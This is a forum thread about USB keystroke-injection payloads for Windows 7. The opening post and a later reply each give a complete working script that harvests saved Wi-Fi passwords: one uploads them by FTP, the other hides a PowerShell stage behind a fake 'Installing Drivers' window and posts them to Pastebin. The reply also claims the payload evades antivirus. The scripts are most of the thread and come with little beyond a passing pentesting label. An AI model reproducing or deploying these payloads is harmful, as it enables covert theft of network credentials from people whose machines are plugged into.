Bucky67GTO Posted December 28, 2012 Share Posted December 28, 2012 For windows 7....This script will export the wifi settings then send to an ftp server of your choice. the cool part is that the security is exported in clear text. For pentesting this is fantastic. After sending the file it will delete the exports from the sending directory. Thoughts? I know I can play with the delays a bit, but works in under a minute. DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd ENTER DELAY 400 STRING netsh wlan export profile key=clear ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ftp -i FTPSERVER ENTER DELAY 400 STRING LOGIN NAME ENTER DELAY 400 STRING LOGIN PASSWORD ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING MPUT *.xml ENTER DELAY 2000 STRING bye ENTER DELAY 400 STRING del *.xml ENTER DELAY 200 ALT SPACE STRING c Quote Link to comment Share on other sites More sharing options...
C3PBRO Posted December 28, 2012 Share Posted December 28, 2012 Wow, not too bad for your first script! Keep it up. Quote Link to comment Share on other sites More sharing options...
PineDominator Posted December 28, 2012 Share Posted December 28, 2012 Needs to be added to the wiki:-) Quote Link to comment Share on other sites More sharing options...
Bucky67GTO Posted December 28, 2012 Author Share Posted December 28, 2012 Added to Wiki. Quote Link to comment Share on other sites More sharing options...
Bucky67GTO Posted January 1, 2013 Author Share Posted January 1, 2013 Has anyone used it yet? How does it work for you? Ideas for improvement? Quote Link to comment Share on other sites More sharing options...
mreidiv Posted January 3, 2013 Share Posted January 3, 2013 (edited) I ran the cmd netsh wlan export profile key=clear and i do not see that password in clear text, just along string of number and letters, which means it is encrypted You can not reinstall the exported profile on a new machine because the hash is machine specific. Edited January 3, 2013 by mreidiv Quote Link to comment Share on other sites More sharing options...
DrDinosaur Posted January 3, 2013 Share Posted January 3, 2013 (edited) There is a Kautilya payload that exports WLAN passwords to a Pastebin account. It has also been added to duck sauce v.02. I'll add it here if anyone wants to try it out. It works prefectly on my Teensy with Kautilya, so it can probably work on the Ducky. This is undetected by Bitdefender Total Security 2013 if anyone was wondering. REM Description: Grabs WLAN Key information REM Author: COnverted from Kautilya by Prickleypaw REM DuckSauce v0.2 by Prickleypaw REM ---- Command Prompt DuckSauce v.02 ---- ESCAPE CONTROL ESCAPE STRING cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers" ENTER DELAY 250 STRING echo $wlans = netsh wlan show profiles ^| Select-String -Pattern "All User Profile" ^| Foreach-Object {$_.ToString()} > %temp%\wlan.ps1 ENTER STRING echo $exportdata = $wlans ^| Foreach-Object {$_.Replace(" All User Profile : ",$null)} >> %temp%\wlan.ps1 ENTER STRING echo $data = $exportdata ^| ForEach-Object {netsh wlan show profiles name="$_" key=clear} >> %temp%\wlan.ps1 ENTER STRING echo Function Post_http($url,$parameters) >> %temp%\wlan.ps1 ENTER STRING echo { >> %temp%\wlan.ps1 ENTER STRING echo $http_request = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\wlan.ps1 ENTER STRING echo $http_request.open("POST", $url, $false) >> %temp%\wlan.ps1 ENTER STRING echo $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") >> %temp%\wlan.ps1 ENTER STRING echo $http_request.setRequestHeader("Content-length", $parameters.length); >> %temp%\wlan.ps1 ENTER STRING echo $http_request.setRequestHeader("Connection", "close") >> %temp%\wlan.ps1 ENTER STRING echo $http_request.send($parameters) >> %temp%\wlan.ps1 ENTER STRING echo $script:session_key=$http_request.responseText >> %temp%\wlan.ps1 ENTER STRING echo $session_key >> %temp%\wlan.ps1 ENTER STRING echo } >> %temp%\wlan.ps1 ENTER REM ---- need to enter Pastebin information below ---- STRING echo Post_http "http://pastebin.com/api/api_login.php" "api_dev_key=INPUT2&api_user_name=INPUT0&api_user_password=INPUT1" >> %temp%\wlan.ps1 ENTER STRING echo Post_http "http://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=INPUT2&api_paste_name=Wlan_Info&api_paste_code=$data&api_paste_private=2" >> %temp%\wlan.ps1 ENTER STRING echo Set oShell = CreateObject("WScript.Shell") > %temp%\wlan.vbs ENTER STRING echo oShell.Run("powershell.exe -ExecutionPolicy Bypass -noLogo -command %temp%\wlan.ps1"),0,true >> %temp%\wlan.vbs ENTER STRING wscript %temp%\wlan.vbs ENTER STRING exit ENTER STRING exit Edited January 3, 2013 by DrDinosaur Quote Link to comment Share on other sites More sharing options...
Bucky67GTO Posted January 9, 2013 Author Share Posted January 9, 2013 Sadly, it seems you are correct. I ran on my machine and got unfiltered. ran on a client and came up encrypted. Not sure the user i tested on was an administrator of the machine, I know I am. Wondering if that is the issue? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.